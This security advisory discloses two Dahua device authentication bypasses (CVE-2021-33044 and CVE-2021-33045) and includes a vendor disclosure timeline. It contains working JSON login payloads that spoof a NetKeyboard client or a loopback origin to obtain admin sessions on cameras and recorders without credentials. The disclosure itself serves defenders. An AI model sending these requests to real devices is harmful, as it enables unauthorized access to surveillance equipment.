[STX]

Subject: [Update]: Dahua Authentication bypass (CVE-2021-33044, CVE-2021-33045)

Attack vector: Remote
Authentication: Anonymous (no credentials needed)
Researcher: bashis <mcw noemail eu> (2021)
Limited Disclosure: September 6, 2021
Full Disclosure: October 6, 2021
PoC: https://github.com/mcw0/DahuaConsole

-=[Dahua]=-
Advisory: https://www.dahuasecurity.com/support/cybersecurity/details/957
Firmware: https://www.dahuasecurity.com/support/downloadCenter/firmware

-=[Timeline]=-
June 13, 2021: Initiated contact with Dahua PSIRT (CyberSecurity@dahuatech.com)
June 17, 2021: Sent reminder to Dahua PSIRT
June 18, 2021: Asked IPVM for help to get in contact with Dahua
June 18, 2021: Received ACK from IPVM, told they sent note to Dahua
June 19, 2021: ACK received from Dahua PSIRT, asked for additional details
June 19, 2021: Additional details including PoC sent
June 21, 2021: ACK received, vulnerabilites confirmed
June 23, 2021: Dahua PSIRT asked for "coordinated disclosure"
June 23, 2021: Confirmed 90 days before my disclosure, said they may release updated firmware anytime from now
June 24, 2021: Received CVE-2021-33044, I asked about the second CVE
July 03, 2021: Received CVE-2021-33045, Dahua PSIRT asked again for "coordinated disclosure"
July 04, 2021: Confirmed "coordinated disclosure", once again
July 05, 2021: Dahua PSIRT tried convince me for "Full Disclosure" for vendor only, and "Limited Disclosure" for outside world
July 05, 2021: Disagreed, told I will let Dahua PSIRT read my note before "Limited Disclosure" September 6, 2021.
               "Full Disclosure" will be October 6, 2021,
August 30, 2021: Dahua PSIRT asked to read my "Limited Disclosure" note
August 30, 2021: Sent my "Limited Disclosure" note
September 1, 2021: Dahua PSIRT informing about release of their Security Advisory and firmware updates
September 1, 2021: Notified Dahua PSIRT that I cannot find firmware updates for my IPC/VTH/VTO devices
September 2, 2021: Dahua PSIRT pointed oversea website, asked for what models I have so Dahua could release firmware
September 2, 2021: Refused to provide details, as I do expect me to find firmware on their website
September 3, 2021: Dahua PSIRT informed that R&D will upload updated firmware in batches
September 6, 2021: Limited Disclosure
October 6, 2021: Full Disclosure


-=[NetKeyboard Vulnerability]=-

CVE-2021-33044

Vulnerability:
        "clientType": "NetKeyboard",
Vulnerable device types: IPC/VTH/VTO (tested)
Vulnerable Firmware: Those devices who do not support "NetKeyboard" functionality (older than June 2021)
Protocol: DHIP and HTTP/HTTPS

Details:
Setting above "Vulnerability" on "Vulnerable device types" during 1st or 2nd "global.login" sequence will simply bypass authentication.

Successful bypass returns: {"id":1,"params":{"keepAliveInterval":60},"result":true,"session":<sessionID>}

[Example]
{
    "method": "global.login",
    "params":
    {
        "userName": "admin",
        "loginType": "Direct",
        "clientType": "NetKeyboard",
        "authorityType": "Default",
        "passwordType": "Default",
        "password": "Not Used"
    },
    "id": 1,
    "session": 0
}

-=[Loopback Vulnerability]=-

CVE-2021-33045

Vulnerability:
        "ipAddr": "127.0.0.1",
        "loginType": "Loopback",
        "clientType": "Local",

Vulnerable device types: IPC/VTH/VTO/NVR/DVR (tested)
Vulnerable Firmware: Firmware version older than beginning/mid 2020.
Protocol: DHIP

Details:
Setting above "Vulnerability" on "Vulnerable device types" during 1st or 2nd "global.login" sequence pretends that the login request comes from "loopback" and will therefore bypass legitimate authentication.

Successful bypass returns: {"id":1,"params":{"keepAliveInterval":60},"result":true,"session":<sessionID>}


[Example]
Random MD5 with l/p: admin/admin
{
    "method": "global.login",
    "params":
    {
        "userName": "admin",
        "ipAddr": "127.0.0.1",
        "loginType": "Loopback",
        "clientType": "Local",
        "authorityType": "Default",
        "passwordType": "Default",
        "password": "[REDACTED]"
    },
    "id": 1,
    "session": 0
}

Plain text with l/p: admin/admin
{
    "method": "global.login",
    "params":
    {
        "userName": "admin",
        "ipAddr": "127.0.0.1",
        "loginType": "Loopback",
        "clientType": "Local",
        "authorityType": "Default",
        "passwordType": "Plain",
        "password": "admin"
    },
    "id": 1,
    "session": 0
}

[ETX]